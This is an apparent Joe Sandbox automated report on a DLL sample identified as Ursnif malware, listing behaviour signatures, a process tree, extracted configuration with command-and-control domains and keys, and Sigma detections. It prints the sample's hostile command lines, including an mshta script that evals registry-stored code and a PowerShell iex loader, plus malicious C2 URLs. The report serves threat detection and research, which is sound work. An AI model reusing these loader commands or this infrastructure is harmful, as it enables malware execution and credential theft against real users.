Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report data.dll

Overview

General Information

Sample Name:data.dll
Analysis ID:498359
MD5:b0165e4e73dad2ac1cb519ea1eab8bd6
SHA1:4ebb5db088d233d4c85b19b299613a240ce25c95
SHA256:7ff6558fd39f6d8db53aa0baa3f3a9b1edb02ea2631102b6d85eafaf4bbd702b
Tags:dll
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Found malware configuration
Sigma detected: Powershell run code from registry
Multi AV Scanner detection for submitted file
Multi AV Scanner detection for domain / URL
Sigma detected: Encoded IEX
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Compiles code for process injection (via .Net compiler)
Uses nslookup.exe to query domains
Writes or reads registry keys via WMI
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
May check the online IP address of the machine
Sigma detected: MSHTA Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Tries to steal Mail credentials (via file access)
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Suspicious powershell command line found
Modifies the prolog of user mode functions (user mode inline hooks)
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Modifies the import address table of user mode modules (user mode IAT hooks)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Queries the installation date of Windows
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Rundll32 Activity
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Enables debug privileges
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6856 cmdline: loaddll32.exe 'C:\Users\user\Desktop\data.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 484 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\data.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 1848 cmdline: rundll32.exe 'C:\Users\user\Desktop\data.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 4868 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
          • rundll32.exe (PID: 6508 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 6616 cmdline: rundll32.exe C:\Users\user\Desktop\data.dll,Bonebegin MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4500 cmdline: rundll32.exe C:\Users\user\Desktop\data.dll,Father MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 1444 cmdline: rundll32.exe C:\Users\user\Desktop\data.dll,Ratherdesign MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • control.exe (PID: 6988 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
      • rundll32.exe (PID: 3980 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
  • mshta.exe (PID: 4812 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Qod1='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qod1).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 4588 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 1568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6836 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6316 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF604.tmp' 'c:\Users\user\AppData\Local\Temp\a52acufz\CSCA20CD7516B4D483281CF5F38543E99A.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 5528 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6200 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES20A.tmp' 'c:\Users\user\AppData\Local\Temp\ddwuzigh\CSCFB1F6E3C794C45BDA93B7DDF91AC3ADC.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • RuntimeBroker.exe (PID: 3656 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • cmd.exe (PID: 5008 cmdline: cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\380E.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 5336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • nslookup.exe (PID: 1424 cmdline: nslookup myip.opendns.com resolver1.opendns.com MD5: AF1787F1DBE0053D74FC687E7233F8CE)
        • cmd.exe (PID: 3512 cmdline: cmd /C 'echo -------- >> C:\Users\user\AppData\Local\Temp\380E.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • RuntimeBroker.exe (PID: 4268 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • RuntimeBroker.exe (PID: 4772 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • cmd.exe (PID: 1260 cmdline: 'C:\Windows\syswow64\cmd.exe' /C pause dll mail, , MD5: F3BDBE3BB6F734E357235F4D5898582D)
  • mshta.exe (PID: 6692 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Dsd4='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dsd4).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 3740 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 2812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 7024 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 4504 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF652.tmp' 'c:\Users\user\AppData\Local\Temp\aixojixg\CSC8AF62C77111B490CBA18A772C2BF28D9.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 2088 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6248 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES47B.tmp' 'c:\Users\user\AppData\Local\Temp\keehvxm3\CSC58F6D56599B14CCABEBFA477BAE65D74.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "TQcvS5IrBIzT3+zGJZ6/B2cbmD8QQfXWsXQyoKLnldUl+fxloKcyGDdinb2QDD2PXD9XpRc5HbwrNqmPhmWJ0e/UBRwWUbictoSBMJ4aPIlTym7tmGSfnad7IPv5Srn06Y3XBZuYQ1Xys1ZxJwHplzKU0w90/qyyPVRqKOq/MLuCVIMXJCRzYsm45jCi3wlMV3wGL62NM3woVBhffjDDamQ53wj1axbnrsRRrHGvT3qf401ulwz8Ta2wR4uBYmHqgQhJz/9sbeghYJb5FWrjfTJDZcpuOb/2rXGCjZzLO89NTeNJJsLx8uenN3zhb+nnl/3yl1tkz3umoGAvkIUnqQXKMRLBu54y8WHgbT1gdAw=", "c2_domain": ["init.icecreambob.com", "app.updatebrouser.com", "fun.lakeofgold.com"], "botnet": "3500", "server": "580", "serpent_key": "34V2LBzJE8iG98YR", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000003.775929004.0000000000DB0000.00000040.00000001.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
    00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000022.00000000.912908766.0000000000920000.00000040.00020000.sdmpJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
        00000003.00000003.822188626.00000000054D8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 98 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.3.loaddll32.exe.10d8cd6.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              0.2.loaddll32.exe.dd0000.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                3.2.rundll32.exe.5d0000.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                  0.2.loaddll32.exe.30a94a0.1.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                    5.3.rundll32.exe.4f694a0.1.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                      Click to see the 19 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Encoded IEXShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Qod1='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qod1).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4812, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4588
                      Sigma detected: MSHTA Spawning Windows ShellShow sources
                      Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Qod1='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qod1).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4812, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4588
                      Sigma detected: Mshta Spawning Windows ShellShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Qod1='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qod1).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4812, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4588
                      Sigma detected: Suspicious Csc.exe Source File FolderShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4588, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline', ProcessId: 6836
                      Sigma detected: Suspicious Rundll32 ActivityShow sources
                      Source: Process startedAuthor: juju4, Jonhnathan Ribeiro, oscd.community: Data: Command: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 6988, ProcessCommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, ProcessId: 3980
                      Sigma detected: Non Interactive PowerShellShow sources
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Qod1='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qod1).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4812, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4588
                      Sigma detected: T1086 PowerShell ExecutionShow sources
                      Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132780367479355110.4588.DefaultAppDomain.powershell

                      Data Obfuscation:

                      barindex
                      Sigma detected: Powershell run code from registryShow sources
                      Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Qod1='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qod1).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4812, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4588

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Antivirus detection for URL or domainShow sources
                      Source: http://init.icecreambob.com/FcQup_2BTAzx5PF2I3Tn/YlRrkU5iinU1xuRm5TK/CmVp_2BlzVsGcnrzGccrm7/ksEs9ImmAvira URL Cloud: Label: malware
                      Source: http://init.icecreambob.com/zx75I3NNGmfLGn8pRj68/5q8NiboB_2FSEFLMm1p/GkM07ifmkRoyAPVxlJaDy3/cXr6SDsbgoHPm/PaJLAxVV/txoYRHBbj9M336C_2FP0F_2/FUuIUTfxn8/_2Fi1Q9Nh_2BYEyGG/g7XOKDVcckgo/6ifLOiy2t7I/1SoBj6Jybx3_2F/lN5De25izDb_2BsQi5Wix/BNFu2ADC3y17pVCQ/oz9_2B52JzEyRR4/O_2FqG0LC5012e1TXc/xR9rFY1G5/iapdd6603NTaeINQSp_2/BwLMzJ7w5SugcYmEG0J/qMt4_2FOPEov9_2Bo1MdfB/1y5TCsV89mnx3/ekW9ulBTE4wo3daXfFHw/KTAvira URL Cloud: Label: malware
                      Source: http://init.icecreambob.com/FcQup_2BTAzx5PF2I3Tn/YlRrkU5iinU1xuRm5TK/CmVp_2BlzVsGcnrzGccrm7/ksEs9ImmPr12_/2Bzh4tdV/KDpXfYGpjXykhg2xrNZQnLl/eQWxO9UJs6/yiNSkrLwUALCzuZwZ/kdGCEU3rIU9m/RGyuFMKeogE/z1UGBluOo2rYqx/Sf1vojdcef_2FoAlYSwrS/eWFw3oSweCgrgQTo/R3sh0ZaR7_2BXrU/KBuwJkO2cZWh9s5jos/PpUP1bcud/5c_2B9g4iz3DCS_2B4Cz/pQllr8YcQ_2FVn4H2Us/rP5gQf2cVzgDcEADA7kdUN/KefPCJRSUE50z/YwbIZJdHqw/X0icAvira URL Cloud: Label: malware
                      Source: http://init.icecreambob.com/lbKAvira URL Cloud: Label: malware
                      Source: http://init.icecreambob.com/Avira URL Cloud: Label: malware
                      Source: http://init.icecreambob.com/og7BnMlwe_2BBL3VbbSex/Z2wNM4qLt9ZGOnrN/9je8jFPaDsbcMzh/J_2BWsBwN0E9DyNOrX/d2qP1bGCk/qJX6O5QV7cikPdeCysOT/SVA8NuODHqgxyywc97o/sy0RL7jVfhXgOS_2F71qSG/2FS97AOq0AZ7i/X9_2BsM8/SJH1OhdjW9LhTsNZM3lXLoj/SkVBjHPOLQ/6GYRgOB9uQP3Kv3KV/fG6AntXu_2Fz/nGnOrkp86kX/RqEbx2FTMLsnk_/2FwjN_2B5_2BN0BKA_2FD/vDq8sU2vs2Ajys3z/1dncEwDhZBm_2B_/2BT0IVCl_2Fi1ROltK/Ns3vDVNy1/kniVonoTwHdN/F4BE_2BAvira URL Cloud: Label: malware
                      Source: http://init.icecreambob.com/WD1GVGFxgZw/vdm2GeJ_2BleeD/xBKgH3gETrFFIsar7DerZ/qXw_2BmqCKfPdDFV/h8dkp6DT7p7lsEb/gtBepZBTsY8u6IZ_2B/slZYk8jOI/KWElWApc2AbPjj3JcqRW/pbQLCPSQWt3ZN3tjPe8/mXL41rn8MBcUk2OkcsuXJx/EoX5HyK9gu6tJ/HdiOJ_2F/vkfbE_2BFoaAHj2fO1r8paT/WkrWga9cjs/R1EobQ_2FVIB2FUG2/gDd0_2B_2Bn1/TZlCNHxakZo/w6E7c784GfHMDV/_2Fz5c89FcKDHFuQdUlIO/O21na4IIxgsQc_2B/zRGRLvdYbxEEQyb/llhWY2ulIai/ojLyAvira URL Cloud: Label: malware
                      Source: http://init.icecreambob.com/zx75I3NNGmfLGn8pRj68/5q8NiboB_2FSEFLMm1p/GkM07ifmkRoyAPVxlJaDy3/cXr6SDsbAvira URL Cloud: Label: malware
                      Source: http://init.icecreambob.com/lAvira URL Cloud: Label: malware
                      Source: http://init.icecreambob.com/2dRjaoZ5ba/_2B9OCZL2JKsW54Zw/b8_2FudlSzim/FebecF2Mr0l/RLhLAUL9EkrBQ6/jcfZJyjU6XRJEy_2F_2Fw/U4DTV9Ne0aXzpB9J/0iupMlpKOkgE91k/O1eWSmo3SiP86KIi_2/Fb913ObwC/qpNQAlO4bBFCqmydHOLy/nNarqOCZZOFGkIl4hzv/0jh_2Fn5oIgCb_2BiKYiQR/_2BU0c0XcTad1/VVgGQIES/_2B4c60XhwvhKtewqx0YhNF/9_2B9c5LC4/AStWPuhmAHWEYDBRQ/AKTTfZkbsU8X/VSsiQHsgzPR/ZrnjJVXfpIalCe/F_2BaXGFB0UzrQMjtIKjY/vg3Zv3Ys/iAvira URL Cloud: Label: malware
                      Found malware configurationShow sources
                      Source: 00000002.00000003.775929004.0000000000DB0000.00000040.00000001.sdmpMalware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "TQcvS5IrBIzT3+zGJZ6/B2cbmD8QQfXWsXQyoKLnldUl+fxloKcyGDdinb2QDD2PXD9XpRc5HbwrNqmPhmWJ0e/UBRwWUbictoSBMJ4aPIlTym7tmGSfnad7IPv5Srn06Y3XBZuYQ1Xys1ZxJwHplzKU0w90/qyyPVRqKOq/MLuCVIMXJCRzYsm45jCi3wlMV3wGL62NM3woVBhffjDDamQ53wj1axbnrsRRrHGvT3qf401ulwz8Ta2wR4uBYmHqgQhJz/9sbeghYJb5FWrjfTJDZcpuOb/2rXGCjZzLO89NTeNJJsLx8uenN3zhb+nnl/3yl1tkz3umoGAvkIUnqQXKMRLBu54y8WHgbT1gdAw=", "c2_domain": ["init.icecreambob.com", "app.updatebrouser.com", "fun.lakeofgold.com"], "botnet": "3500", "server": "580", "serpent_key": "34V2LBzJE8iG98YR", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: data.dllVirustotal: Detection: 7%Perma Link
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: art.microsoftsofymicrosoftsoft.atVirustotal: Detection: 10%Perma Link
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00DD3FAB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
                      Source: data.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: data.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: h.pdb> source: powershell.exe, 0000000F.00000003.961179690.0000029E611B1000.00000004.00000001.sdmp
